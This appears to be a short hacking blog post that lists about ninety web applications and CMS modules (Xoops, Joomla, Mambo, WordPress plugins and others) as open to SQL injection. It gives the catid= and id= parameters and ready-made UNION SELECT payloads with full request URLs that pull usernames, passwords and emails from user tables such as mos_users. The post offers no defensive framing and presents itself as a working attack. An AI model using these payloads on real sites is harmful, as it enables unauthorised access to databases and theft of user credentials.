Found SQL query injection

Script Name:

Active Auction Pro
Active Buy and Sell
Active Link Engine
Active Photo Gallery
Active Trade
Ace Image Hosting Script
AdServe (Wordpress plugin)
aflog
Aktueldownload Script
AlstraSoft Video Share Enterprise
ANGEL Learning Management Suite
Articles (Xoops module)
AV Arcade
Berthanas Ziyaretci Defteri
boastMachine
CascadianFAQ
CMX Acronym (phpBB module)
Content Injector
Creascripts Creadirectory
DGNews
Digiappz DigiAffiliate
E-Vendejo
EfesTECH Haber
eMeeting Dating Software
eSyndiCat Directory Software
EXO PHPDesk
Flinx
FriendFinder (Xoops module)
GeometriX Download Portal
Glossaire (Xoops module)
Glossary (Mambo module)
GPS Content Management System
Grayscale Blog
Hunkaray Duyuru Scripti
iG Calendar
iG Shop
JBlog
Jeuxflash (KwsPHP module)
JobSite Professional
Kolayindir Download
Kshop (Xoops module)
LoveCMS
LushiNews
LushiWarPlaner
MGB
MiNT Haber Sistemi
My Little Forum
NeoRecruit (Joomla module)
NMDeluxe
Noname Media Photo Galerie
Okul Web Otomasyon Sistemi
OpenLD
PHP Event Calendar
PHP Homepage M
PHPEcho CMS
phpMyQuote
Pony Gallery Random Image (Joomla module)
phpns
Planetgraphic ASP News
PollMentor
ProfileCMS
Proxy Anket
QuickTicket
Recipes (Mambo module)
RunawaySoft Haber Portal
ScriptMagix Jokes
ScriptMagix Recipes
SH-News
Simple Web Content Management System
SimpleBlog
SonicBB
Stride
TLM CMS
Toko Instan
TotalCalendar
Tiger Php News System
v4bJournal (PostNuke module)
Vizayn Haber
WavelinkMedia TutorialCMS
Web Template Management System
Webace-Linkscript
Webformatique Car Manager
webSPELL
WolioCMS
WP-Cal (Wordpress plugin)
X-dev xNews
X-ice Haber Sistemi
Youtube Clone
WSN Links Basic Edition
?


Parameters sql injection:
catid=
id=

SQL query injection:

-1 union select 1,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11 from mos_users--
--------------------------------------------------------------------------------
-9 union select 1,concat(0x53694B6F646F51,0x7c,user),id,4,email,password from user/*

Url requested:
/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,
concat(username,0x3a,%20password),6,7,8,9,10,11%20from%20mos_users--
--------------------------------------------------------------------------------
/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,concat(0x53694B6F
646F51,0x7c,user),id,4,email,password%20from%20user/*
Found SQL query injection Found SQL query injection Reviewed by Furkan Samadha on 8:18 AM Rating: 5